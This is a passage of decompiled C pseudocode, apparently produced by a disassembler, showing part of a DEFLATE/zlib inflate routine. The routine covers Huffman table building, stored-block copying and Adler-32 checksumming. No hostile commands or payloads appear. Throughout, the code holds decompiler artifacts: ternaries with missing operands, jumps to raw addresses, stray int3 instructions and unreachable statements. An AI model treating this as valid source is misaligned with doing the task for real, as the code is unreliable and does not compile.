																	L102:
																	_t618 =  *_t847;
																	_t847 = _t847 + 1;
																	(_t1030 + 0x2920)[_t945] = _t618;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 0x18) = _t847;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1050 - 8;
																if(_t1050 >= 8) {
																	L100:
																	(_t1030 + 0x2920)[_t945] = _t968;
																	_t1050 = _t1050 - 8;
																	_t968 = _t968 >> 8;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 4) = _t968;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L98:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t968 = _t968 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t968;
																		__eflags = _t1050 - 8;
																		if(_t1050 < 8) {
																			continue;
																		} else {
																			L99:
																			_t945 =  *(_t1065 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1030 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t618 =  *(_t1030 + 0x2922) & 0x000000ff;
														 *(_t1065 - 8) = ( *(_t1030 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1030 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1065 - 8) - ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff);
														if( *(_t1065 - 8) != ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff)) {
															L265:
															 *(_t1065 - 0xc) = 0xffffffff;
															 *_t1030 = 0x27;
															goto L292;
														} else {
															L104:
															_t953 =  *(_t1065 - 8);
															while(1) {
																L105:
																__eflags = _t953;
																if(_t953 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1050;
																if(_t1050 == 0) {
																	L113:
																	_t618 =  *(_t1065 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t953;
																		if(_t953 == 0) {
																			break;
																		}
																		L116:
																		_t1016 =  *((intOrPtr*)(_t1065 - 0x40));
																		__eflags = _t618 - _t1016;
																		if(_t618 < _t1016) {
																			L118:
																			_t618 =  *(_t1065 - 0x20);
																			__eflags = _t847 - _t618;
																			if(_t847 >= _t618) {
																				L247:
																				_t1030 =  *(_t1065 - 0x14);
																				 *_t1030 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t968 = _t1016 -  *(_t1065 - 0x10);
																				_t1039 = _t618 - _t847;
																				__eflags = _t968 - _t1039;
																				_t715 =  <  ? _t968 : _t1039;
																				__eflags = ( <  ? _t968 : _t1039) - _t953;
																				if(( <  ? _t968 : _t1039) >= _t953) {
																					_t1030 = _t953;
																				} else {
																					__eflags = _t968 - _t1039;
																					_t1030 =  <  ? _t968 : _t1039;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t847 = _t847 + _t1030;
																				_t618 =  *(_t1065 - 0x10) + _t1030;
																				_t1068 = _t1068 + 0xc;
																				 *(_t1065 - 0x18) = _t847;
																				_t953 =  *(_t1065 - 8) - _t1030;
																				 *(_t1065 - 0x10) = _t618;
																				 *(_t1065 - 8) = _t953;
																				continue;
																			}
																		} else {
																			L117:
																			_t1030 =  *(_t1065 - 0x14);
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x2d814b1;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1050 - 8;
																	if(_t1050 >= 8) {
																		L110:
																		_t618 = _t968 & 0x000000ff;
																		_t968 = _t968 >> 8;
																		_t1050 = _t1050 - 8;
																		 *(_t1065 - 0x28) = _t618;
																		 *(_t1065 - 4) = _t968;
																		L111:
																		__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																		_t1030 =  *(_t1065 - 0x14);
																		if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																			L246:
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																			 *( *(_t1065 - 0x10)) = _t618;
																			_t953 =  *(_t1065 - 8) - 1;
																			 *(_t1065 - 8) = _t953;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t847 -  *(_t1065 - 0x20);
																			if(_t847 >=  *(_t1065 - 0x20)) {
																				break;
																			}
																			L109:
																			_t618 = ( *_t847 & 0x000000ff) << _t1050;
																			_t847 = _t847 + 1;
																			_t968 = _t968 | _t618;
																			 *(_t1065 - 0x18) = _t847;
																			_t1050 = _t1050 + 8;
																			 *(_t1065 - 4) = _t968;
																			__eflags = _t1050 - 8;
																			if(_t1050 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1030 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L92:
															_t721 = ( *_t847 & 0x000000ff) << _t1050;
															_t1050 = _t1050 + 8;
															_t999 = _t999 | _t721;
															_t847 = _t847 + 1;
															 *(_t1065 - 0x18) = _t847;
															_t618 = _t1050 & 0x00000007;
															 *(_t1065 - 4) = _t999;
															__eflags = _t1050 - _t618;
															if(_t1050 < _t618) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1030 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L88:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t968 = _t968 | _t618;
													 *(_t1065 - 0x18) = _t847;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - 3;
													if(_t1050 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1030 = 3;
												L285:
												__eflags =  *(_t1065 + 0x18) & 0x00000002;
												L286:
												L287:
												_t628 =  !=  ? 1 : _t618;
												 *(_t1065 - 0xc) = _t628;
												__eflags = _t628 - 1;
												if(_t628 != 1) {
													L288:
													__eflags = _t628 - 0xfffffffc;
													if(_t628 != 0xfffffffc) {
														L289:
														L292:
														_t673 =  *(_t1065 - 0x3c);
														__eflags = _t847 - _t673;
														if(_t847 > _t673) {
															while(1) {
																L293:
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	goto L295;
																}
																L294:
																_t847 = _t847 - 1;
																_t1050 = _t1050 - 8;
																__eflags = _t847 - _t673;
																if(_t847 > _t673) {
																	continue;
																}
																goto L295;
															}
														}
													}
												}
											}
											goto L295;
										}
										L252:
										_t618 = _t1050 & 0x00000007;
										__eflags = _t1050 - _t618;
										if(_t1050 >= _t618) {
											L256:
											_t688 =  *(_t1065 - 0x3c);
											_t894 = _t1050 & 0x00000007;
											_t994 = _t968 >> _t894;
											_t1050 = _t1050 - _t894;
											 *(_t1065 - 4) = _t994;
											__eflags = _t847 - _t688;
											if(_t847 > _t688) {
												while(1) {
													L257:
													__eflags = _t1050 - 8;
													if(_t1050 < 8) {
														goto L259;
													}
													L258:
													_t847 = _t847 - 1;
													_t1050 = _t1050 - 8;
													__eflags = _t847 - _t688;
													if(_t847 > _t688) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t618 = _t1050;
											asm("bts edx, eax");
											__eflags = _t618 - 0x20;
											_t896 =  >=  ? _t994 : 0;
											_t995 = _t994 ^ _t896;
											__eflags = _t618 - 0x40;
											_t897 =  >=  ? _t995 : _t896;
											 *(_t1065 - 4) =  *(_t1065 - 4) & _t995 - 0x00000001;
											__eflags =  *(_t1065 + 0x18) & 0x00000001;
											if(( *(_t1065 + 0x18) & 0x00000001) == 0) {
												L290:
												_t689 = 0;
												__eflags = 0;
												 *_t1030 = 0x22;
												L291:
												 *(_t1065 - 0xc) = _t689;
												goto L292;
											} else {
												L261:
												_t898 = 0;
												while(1) {
													L277:
													 *(_t1065 - 8) = _t898;
													__eflags = _t898 - 4;
													if(_t898 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1050;
													if(_t1050 != 0) {
														L281:
														_t997 =  *(_t1065 - 4);
														__eflags = _t1050 - 8;
														if(_t1050 >= 8) {
															L275:
															_t690 = _t997 & 0x000000ff;
															_t1050 = _t1050 - 8;
															__eflags = _t1050;
															 *(_t1065 - 4) = _t997 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	break;
																}
																L273:
																_t618 = ( *_t847 & 0x000000ff) << _t1050;
																_t1050 = _t1050 + 8;
																_t997 = _t997 | _t618;
																_t847 = _t847 + 1;
																 *(_t1065 - 4) = _t997;
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	continue;
																} else {
																	L274:
																	_t898 =  *(_t1065 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1030 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t847 -  *(_t1065 - 0x20);
														if(_t847 >=  *(_t1065 - 0x20)) {
															L283:
															 *_t1030 = 0x2a;
															goto L285;
														} else {
															L280:
															_t690 =  *_t847 & 0x000000ff;
															_t847 = _t847 + 1;
															L276:
															 *(_t1065 - 0x24) = _t690;
															_t618 =  *(_t1030 + 0x10) << 0x00000008 |  *(_t1065 - 0x24);
															_t898 = _t898 + 1;
															__eflags = _t898;
															 *(_t1030 + 0x10) = _t618;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													break;
												}
												L255:
												_t695 = ( *_t847 & 0x000000ff) << _t1050;
												_t1050 = _t1050 + 8;
												_t968 = _t968 | _t695;
												_t847 = _t847 + 1;
												 *(_t1065 - 4) = _t968;
												_t618 = _t1050 & 0x00000007;
												__eflags = _t1050 - _t618;
												if(_t1050 < _t618) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1030 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1050 - 0xf;
									if(_t1050 < 0xf) {
										_t1021 =  *(_t847 + 1) & 0x000000ff;
										_t861 = _t1050;
										_t732 =  *_t847 & 0x000000ff;
										_t847 = _t847 + 2;
										_t1030 =  *(_t1065 - 0x14);
										 *(_t1065 - 0x18) = _t847;
										 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1021 << 0x00000008 | _t732) << _t861;
										_t1050 = _t1050 + 0x10;
										__eflags = _t1050;
										_t968 =  *(_t1065 - 4);
									}
									_t725 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
									 *(_t1065 - 0x1c) = _t725;
									__eflags = _t725;
									if(_t725 < 0) {
										L53:
										goto 0x2d81472;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t727 = _t968 >> _t861;
											_t861 = _t861 + 1;
											_t847 =  *((short*)(_t1030 + 0x960 + ((_t727 & 0x00000001) +  !_t847) * 2));
											__eflags = _t847;
										} while (_t847 < 0);
										 *(_t1065 - 0x1c) = _t847;
										_t847 =  *(_t1065 - 0x18);
									} else {
										L52:
										_t861 = _t725 >> 9;
									}
									L56:
									_t618 =  *(_t1065 - 8);
									_t1050 = _t1050 - _t861;
									_t968 = _t968 >> _t861;
									 *(_t1065 - 4) = _t968;
									 *( *(_t1065 - 0x10)) = _t618;
									_t861 =  *(_t1065 - 0x1c);
									__eflags = _t861 & 0x00000100;
									if((_t861 & 0x00000100) != 0) {
										L83:
										_t171 = _t1065 - 0x10;
										 *_t171 =  *(_t1065 - 0x10) + 1;
										__eflags =  *_t171;
										goto L84;
									} else {
										L57:
										_t730 =  *(_t1065 - 0x10);
										 *(_t730 + 1) = _t861;
										 *(_t1065 - 0x10) = _t730 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t860 =  *(_t1065 - 0x20) - _t847;
													__eflags = _t860 - 4;
													if(_t860 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t870;
											} while (_t870 == 0);
											goto 0x2d8140c;
											asm("int3");
											_t734 =  *_t740;
											 *_t1030 = _t734;
											_t1030 =  *(_t1065 - 0x14);
											__eflags = _t870 - 1;
											if(_t870 > 1) {
												L29:
												L36:
												goto 0x2d81448;
												asm("int3");
												 *(_t968 + 1) =  *((intOrPtr*)(_t734 + 1));
												_t968 =  *(_t1065 - 4);
											}
											L38:
											_t86 = _t1065 - 0x10;
											 *_t86 =  *(_t1065 - 0x10) + _t870;
											__eflags =  *_t86;
											while(1) {
												L39:
												_t860 =  *(_t1065 - 0x20) - _t847;
												__eflags = _t860 - 4;
												if(_t860 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1065 - 0x10) = _t1030;
											_t1030 =  *(_t1065 - 0x14);
											 *(_t1065 - 0xc) = _t968;
											_t968 =  *(_t1065 - 4);
											 *(_t1065 - 8) = _t870;
											__eflags = _t870;
										} while (_t870 <= 0);
										goto 0x2d81434;
										asm("int3");
										_t734 =  *_t624;
										 *_t1030 = _t734;
										_t1030 =  *(_t1065 - 0x14);
										__eflags = _t870 - 1;
										if(_t870 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							L295:
							_t972 =  *(_t1065 - 4);
							L296:
							 *(_t1030 + 4) = _t1050;
							asm("bts ecx, esi");
							__eflags = _t1050 - 0x20;
							_t630 =  >=  ? 0 : 0;
							_t874 = 0 ^ _t630;
							__eflags = _t1050 - 0x40;
							_t631 =  >=  ? _t874 : _t630;
							 *(_t1030 + 0x20) =  *(_t1065 - 0x28);
							_t974 =  *(_t1065 - 0x10) -  *(_t1065 + 0x10);
							__eflags =  *(_t1065 + 0x18) & 0x00000009;
							 *(_t1030 + 0x24) =  *(_t1065 - 8);
							 *(_t1030 + 0x28) =  *(_t1065 - 0x38);
							 *((intOrPtr*)(_t1030 + 0x3c)) =  *((intOrPtr*)(_t1065 - 0x48));
							 *(_t1030 + 0x38) = _t874 - 0x00000001 & _t972;
							 *(_t1065 - 0x10) = _t974;
							 *((intOrPtr*)( *((intOrPtr*)(_t1065 + 8)))) = _t847 -  *(_t1065 - 0x3c);
							_t851 =  *(_t1065 - 0xc);
							 *( *(_t1065 + 0x14)) = _t974;
							if(( *(_t1065 + 0x18) & 0x00000009) != 0) {
								L297:
								__eflags = _t851;
								if(_t851 >= 0) {
									L298:
									_t1052 =  *(_t1030 + 0x1c);
									_t877 = _t1052 & 0x0000ffff;
									_t641 = (0x5e6ea9af * _t974 >> 0x20 >> 0xb) * 0x15b0;
									_t1053 = _t1052 >> 0x10;
									 *(_t1065 - 0x3c) = _t1053;
									_t978 =  *(_t1065 - 0x10) - _t641;
									__eflags =  *(_t1065 - 0x10);
									 *(_t1065 - 0x34) = _t978;
									if( *(_t1065 - 0x10) != 0) {
										L299:
										_t853 = _t978;
										do {
											L300:
											_t979 = 0;
											 *(_t1065 + 0x14) = 0;
											__eflags = _t853 - 7;
											if(_t853 > 7) {
												L301:
												goto 0x2d815c6;
												asm("int3");
												asm("int3");
												asm("int3");
												L302:
												_t1033 = _t1030 - _t641;
												__eflags = _t1033;
												do {
													L303:
													_t979 =  &(_t979[2]);
													_t879 = _t877 + ( *_t641 & 0x000000ff);
													_t880 = _t879 + ( *( *(_t1065 + 0x10) + 1) & 0x000000ff);
													_t881 = _t880 + ( *(2 +  *(_t1065 + 0x10)) & 0x000000ff);
													_t882 = _t881 + ( *( *(_t1065 + 0x10) + 3) & 0x000000ff);
													_t883 = _t882 + ( *( *(_t1065 + 0x10) + 4) & 0x000000ff);
													_t884 = _t883 + ( *( *(_t1065 + 0x10) + 5) & 0x000000ff);
													_t885 = _t884 + ( *( *(_t1065 + 0x10) + 6) & 0x000000ff);
													_t877 = _t885 + ( *( *(_t1065 + 0x10) + 7) & 0x000000ff);
													_t671 =  *(_t1065 + 0x10) + 8;
													_t1053 = _t1053 + _t879 + _t880 + _t881 + _t882 + _t883 + _t884 + _t885 + _t877;
													 *(_t1065 + 0x10) = _t671;
													__eflags = _t1033 + _t671 - _t853;
													_t641 =  *(_t1065 + 0x10);
												} while (_t1033 + _t671 < _t853);
												 *(_t1065 + 0x14) = _t979;
												 *(_t1065 - 0x3c) = _t1053;
											}
											L305:
											_t1030 = 0;
											 *((intOrPtr*)(_t1065 + 8)) = 0;
											__eflags = _t979 - _t853;
											if(_t979 < _t853) {
												L306:
												__eflags = _t853 - _t979 - 2;
												if(_t853 - _t979 >= 2) {
													L307:
													_t651 =  *(_t1065 + 0x14);
													_t1056 =  *(_t1065 + 0x10);
													_t854 = 0;
													_t990 = (_t853 - _t651 - 2 >> 1) + 1;
													__eflags = _t990;
													 *(_t1065 + 0x14) = _t651 + _t990 * 2;
													do {
														L308:
														_t878 = _t877 + ( *_t1056 & 0x000000ff);
														_t654 =  *(_t1056 + 1) & 0x000000ff;
														_t1030 = _t1030 + _t878;
														_t1056 = 2 + _t1056;
														_t877 = _t878 + _t654;
														_t854 = _t854 + _t877;
														_t990 = _t990 - 1;
														__eflags = _t990;
													} while (_t990 != 0);
													_t979 =  *(_t1065 + 0x14);
													 *(_t1065 + 0x10) = _t1056;
													_t1053 =  *(_t1065 - 0x3c);
													 *((intOrPtr*)(_t1065 + 8)) = _t854;
													_t853 =  *(_t1065 - 0x34);
												}
												L310:
												__eflags = _t979 - _t853;
												if(_t979 < _t853) {
													_t984 =  *(_t1065 + 0x10);
													_t877 = _t877 + ( *_t984 & 0x000000ff);
													_t1053 = _t1053 + _t877;
													_t985 =  &(_t984[1]);
													__eflags = _t985;
													 *(_t1065 + 0x10) = _t985;
												}
												L312:
												_t641 =  *((intOrPtr*)(_t1065 + 8)) + _t1030;
												_t1053 = _t1053 + _t641;
												__eflags = _t1053;
											}
											L313:
											L314:
											_t877 = _t877 + (_t641 * _t877 >> 0x20 >> 0xf) * 0xffff000f;
											_t641 = (0x80078071 * _t1053 >> 0x20 >> 0xf) * 0xffff000f;
											_t1053 = _t1053 + _t641;
											_t586 = _t1065 - 0x10;
											 *_t586 =  *(_t1065 - 0x10) - _t853;
											__eflags =  *_t586;
											_t853 = 0x15b0;
											 *(_t1065 - 0x3c) = _t1053;
											 *(_t1065 - 0x34) = 0x15b0;
										} while ( *_t586 != 0);
										goto 0x2d815ef;
										asm("int3");
									}
									L316:
									_t1055 = (_t1053 << 0x10) + _t877;
									 *(_t1030 + 0x1c) = _t1055;
									__eflags = _t851;
									if(_t851 == 0) {
										__eflags =  *(_t1065 + 0x18) & 0x00000001;
										if(( *(_t1065 + 0x18) & 0x00000001) != 0) {
											__eflags = _t1055 -  *(_t1030 + 0x10);
											_t851 =  !=  ? 0xfffffffe : _t851;
											__eflags = _t851;
										}
									}
								}
							}
							L319:
							return _t851;
							L320:
							L58:
							__eflags = _t1050 - 0xf;
							if(_t1050 >= 0xf) {
								L75:
								_t603 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t603;
								__eflags = _t603;
								if(_t603 < 0) {
									L77:
									goto 0x2d8149b;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t605 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t847 =  *((short*)(_t1030 + 0x960 + ((_t605 & 0x00000001) +  !_t847) * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L76:
									_t860 = _t603 >> 9;
									_t618 = _t603 & 0x000001ff;
									 *(_t1065 - 8) = _t618;
								}
								L80:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 - 0x100;
								if(_t861 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t769 =  *(_t1065 - 0x10);
									__eflags = _t769 -  *((intOrPtr*)(_t1065 - 0x40));
									if(_t769 >=  *((intOrPtr*)(_t1065 - 0x40))) {
										L240:
										 *(_t1065 - 0xc) = 2;
										 *_t1030 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t769 = _t861;
										 *(_t1065 - 0x10) = _t769 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t860 - 2;
								if(_t860 >= 2) {
									L73:
									_t969 =  *(_t847 + 1) & 0x000000ff;
									_t625 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									_t860 = _t1050;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | _t969 << _t1050 + 0x00000008 | _t625 << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t618 = _t968 & 0x000003ff;
										_t1031 =  *((short*)(_t1030 + 0x160 + _t618 * 2));
										__eflags = _t1031;
										if(_t1031 < 0) {
											L64:
											__eflags = _t1050 - 0xa;
											if(_t1050 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1065 - 0x1c) = _t860;
												while(1) {
													L67:
													_t1031 =  *((short*)( *(_t1065 - 0x14) + 0x960 + ((_t968 >> _t860 & 0x00000001) +  !_t1031) * 2));
													_t860 =  *(_t1065 - 0x1c) + 1;
													 *(_t1065 - 0x1c) = _t860;
													__eflags = _t1031;
													if(_t1031 >= 0) {
														goto L74;
													}
													L68:
													_t618 = _t860 + 1;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1035 = _t1031 >> 9;
											__eflags = _t1035;
											if(_t1035 == 0) {
												L69:
												_t1030 =  *(_t1065 - 0x14);
												L70:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													L239:
													 *_t1030 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1050 - _t1035;
												if(_t1050 >= _t1035) {
													L74:
													_t1030 =  *(_t1065 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t860 = _t1050;
										_t675 = ( *_t847 & 0x000000ff) << _t860;
										_t847 = _t847 + 1;
										_t968 = _t968 | _t675;
										 *(_t1065 - 0x18) = _t847;
										_t1050 = _t1050 + 8;
										 *(_t1065 - 4) = _t968;
										__eflags = _t1050 - 0xf;
									} while (_t1050 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1065 - 0xc) = 0x40 + _t600 * 0xda0 + _t1030;
					memset(_t1065 - 0xd0, 0, 0x40);
					memset( *(_t1065 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1065 - 0xc) + 0x920, 0, 0x480);
					_t903 = 0;
					_t1068 = _t1068 + 0x24;
					_t1003 = _t1030 + ( *(_t1030 + 0x18) + 0xb) * 4;
					 *(_t1065 - 0x44) = _t1003;
					if( *_t1003 > 0) {
						L143:
						_t1030 =  *(_t1065 - 0xc);
						do {
							L144:
							_t845 =  *(_t903 + _t1030) & 0x000000ff;
							_t903 = _t903 + 1;
							 *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) =  *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) + 1;
						} while (_t903 <  *_t1003);
					}
					L145:
					goto 0x2d81500;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1065 - 0x8c) = _t903;
					 *(_t1065 - 0x90) = _t903;
					 *(_t1065 - 0x2c) = _t903;
					 *(_t1065 - 0x30) = _t903;
					do {
						L147:
						_t782 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd4));
						_t905 = _t903 + _t782 + _t903 + _t782;
						_t1030 = _t1030 + _t782;
						_t783 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd0));
						 *(_t1065 - 0x30) =  *(_t1065 - 0x30) + _t783;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x90)) = _t905;
						_t784 =  *((intOrPtr*)(_t1065 + _t1003 - 0xcc));
						_t907 = _t905 + _t783 + _t905 + _t783;
						 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) + _t784;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x8c)) = _t907;
						_t903 = _t907 + _t784 + _t907 + _t784;
						 *(_t1065 + _t1003 - 0x88) = _t903;
						_t1003 = _t1003 + 0xc;
					} while (_t1003 <= 0x40);
					 *(_t1065 - 0x4c) = _t903;
					 *(_t1065 - 0x24) = _t1030;
					_t1030 =  *(_t1065 - 0x14);
					_t910 =  *(_t1065 - 0x24) +  *(_t1065 - 0x2c) +  *(_t1065 - 0x30);
					if( *(_t1065 - 0x4c) == 0x10000 || _t910 <= 1) {
						L150:
						_t787 =  *(_t1065 - 0x44);
						 *(_t1065 - 0x30) = 0xffffffff;
						 *(_t1065 - 0x4c) = 0;
						if( *_t787 > 0) {
							L151:
							_t1064 =  *(_t1065 - 0x4c);
							do {
								L152:
								L153:
								_t922 =  *(_t1064 + _t787) & 0x000000ff;
								 *(_t1065 - 0x44) = _t922;
								if(_t922 != 0) {
									L154:
									_t824 =  *(_t1065 + _t922 * 4 - 0x90);
									 *(_t1065 - 0x2c) = _t824;
									 *(_t1065 + _t922 * 4 - 0x90) = _t824 + 1;
									 *(_t1065 - 0x24) = _t922;
									if(_t922 != 0) {
										L155:
										do {
											L156:
											 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) >> 1;
											_t844 =  *(_t1065 - 0x24) - 1;
											_t1003 = _t1003 + _t1003 |  *(_t1065 - 0x2c) & 0x00000001;
											 *(_t1065 - 0x24) = _t844;
										} while (_t844 != 0);
										_t922 =  *(_t1065 - 0x44);
									}
									L158:
									if(_t922 > 0xa) {
										L164:
										_t828 =  *(_t1065 - 0xc) + 0x120 + (_t1003 & 0x000003ff) * 2;
										_t847 =  *(_t1065 - 0x30);
										 *(_t1065 - 0x44) = _t828;
										_t829 =  *_t828;
										 *(_t1065 - 0x2c) = _t829;
										__eflags = _t829;
										if(_t829 == 0) {
											 *( *(_t1065 - 0x44)) = _t847;
											_t829 = _t847;
											_t847 = _t847 - 2;
											__eflags = _t847;
											 *(_t1065 - 0x2c) = _t829;
											 *(_t1065 - 0x30) = _t847;
										}
										L166:
										_t1011 = _t1003 >> 9;
										__eflags = _t922 - 0xb;
										if(_t922 > 0xb) {
											L167:
											_t923 = _t922 + 0xfffffff5;
											__eflags = _t923;
											 *(_t1065 - 0x24) = _t923;
											_t924 =  *(_t1065 - 0x2c);
											do {
												L168:
												_t1011 = _t1011 >> 1;
												_t834 = 0x48f - _t924 - (_t1011 & 0x00000001);
												_t927 =  *( *(_t1065 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t927;
												if(_t927 != 0) {
													_t924 = _t927;
												} else {
													 *( *(_t1065 - 0xc) + _t834 * 2) = _t847;
													_t835 =  *(_t1065 - 0x30);
													_t924 = _t835;
													_t836 = _t835 - 2;
													 *(_t1065 - 0x30) = _t836;
													_t847 = _t836;
												}
												L171:
												_t361 = _t1065 - 0x24;
												 *_t361 =  *(_t1065 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1065 - 0x2c) = _t924;
											_t829 = _t924;
										}
										L173:
										_t1003 = (_t1011 >> 0x00000001 & 0x00000001) - _t829;
										__eflags = _t1003;
										 *( *(_t1065 - 0xc) + 0x91e + _t1003 * 2) = _t1064;
									} else {
										L159:
										_t841 = (_t922 << 0x00000009 | _t1064) & 0x0000ffff;
										 *(_t1065 - 0x44) = _t841;
										if(_t1003 < 0x400) {
											L160:
											goto 0x2d8152a;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t842 = _t841 << _t922;
											 *(_t1065 - 0x4c) = _t842 + _t842;
											_t932 =  *(_t1065 - 0xc) + _t1003 * 2 + 0x120;
											do {
												L162:
												 *_t932 = _t1030;
												_t1003 = _t1003 + _t842;
												_t932 =  &(_t932[ *(_t1065 - 0x4c)]);
											} while (_t1003 < 0x400);
											_t1030 =  *(_t1065 - 0x14);
										}
									}
								}
								L174:
								_t787 =  *(_t1030 + 0x18);
								_t1064 = _t1064 + 1;
							} while (_t1064 <  *((intOrPtr*)(_t1030 + 0x2c + _t787 * 4)));
							goto 0x2d81540;
							asm("int3");
						}
						L176:
						if( *(_t1030 + 0x18) != 2) {
							L217:
							 *(_t1030 + 0x18) =  *(_t1030 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t911 = 0;
							while(1) {
								L178:
								_t1004 =  *(_t1065 - 4);
								while(1) {
									L179:
									 *(_t1065 - 8) = _t911;
									if(_t911 >=  *(_t1030 + 0x30) +  *(_t1030 + 0x2c)) {
										break;
									}
									L180:
									if(_t1064 >= 0xf) {
										L197:
										_t802 =  *((short*)(_t1030 + 0x1ca0 + (_t1004 & 0x000003ff) * 2));
										 *(_t1065 - 0x28) = _t802;
										if(_t802 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1065 - 0x28) =  !( *(_t1065 - 0x28));
												_t804 = _t1004 >> _t911;
												_t911 = _t911 + 1;
